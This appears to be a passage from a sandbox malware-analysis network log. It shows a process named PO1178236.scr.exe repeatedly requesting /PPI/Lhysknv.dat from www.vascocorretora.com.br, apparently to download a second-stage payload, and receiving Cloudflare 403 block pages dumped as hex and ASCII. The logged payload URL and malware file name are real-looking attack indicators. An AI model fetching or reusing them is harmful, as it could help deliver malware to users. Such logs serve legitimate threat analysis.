        2025-01-09 07:36:25 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:36:25 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 39 35 66 38 62 33 34 32 35 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c195f8b34258</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:36:25 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 39 35 66 38 62 33 34 32 35 38 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c195f8b34258',t:'MTczNjQwODE4NS4wMDAwMDA='};var a=d
        2025-01-09 07:36:25 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        48192.168.2.949756188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:26 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:26 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:26 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:41 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LAur7M3wIfwHtEvKrByrqYA5pdFYW8hXsOIDGwnTnkNeNsP%2FNjwbT9cFxVoQv3LYaBmK2HqkVwCMO%2BistE7xRc8g1yuETeNE%2FowfbGKQ1no8itSUYCktM20RDlQJhVxJN%2B%2F%2FD7TGHy894xq%2F"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c19f1a2d439a-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2360&min_rtt=2357&rtt_var=891&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1223805&cwnd=233&unsent_bytes=0&cid=c49d991ad6833ad2&ts=993&x=0"
        2025-01-09 07:36:26 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:26 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:36:26 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:26 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 39 66 31 61 32 64 34 33 39 61 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c19f1a2d439a</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:26 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 39 66 31 61 32 64 34 33 39 61 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4e 69 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c19f1a2d439a',t:'MTczNjQwODE4Ni4wMDAwMDA=
        2025-01-09 07:36:26 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        49192.168.2.949757188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:27 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:27 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:27 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:42 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X2Tk15wS1w%2Fvjklz8%2BZtFTR42EsVbt6pHe0KtPYgvLUTD8nV1%2F1MDZUHiLz9pRfgUwXasDUzO7W%2FHZy8tA50WYhcwKwJRRQ4HUa%2F0xwBe2Zuz4%2Bj5ZqFgsf5K1K1v502d5YWqGVFEju7GyFt"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1a2f951de92-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1610&rtt_var=642&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1655328&cwnd=239&unsent_bytes=0&cid=1033024826a3a3e3&ts=147&x=0"
        2025-01-09 07:36:27 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:27 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:27 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:27 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 61 32 66 39 35 31 64 65 39 32 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1a2f951de92</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:27 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 61 32 66 39 35 31 64 65 39 32 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4e 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1a2f951de92',t:'MTczNjQwODE4Ny4wMDAwMDA='}
        2025-01-09 07:36:27 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        50192.168.2.949758188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:27 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:28 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:27 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:42 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jppclza67N0UhK76vXgiteG6ssfiVUGxVjv%2BNLP%2Ffcm%2BpXRYeZVGIlYPjTUT8wvlIp%2BFHpVYIUdsGDtFLGgcTMnNHzdtUORqC%2BaSMD9Zd9pLdV3F9jNiPnPjNfE2WW%2F0RJQ2G8K0fxqh%2Fv0U"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1a6ce9f43d6-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1560&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1838790&cwnd=248&unsent_bytes=0&cid=f20f6b5a36a8b974&ts=147&x=0"
        2025-01-09 07:36:28 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:28 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:36:28 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:28 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 61 36 63 65 39 66 34 33 64 36 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 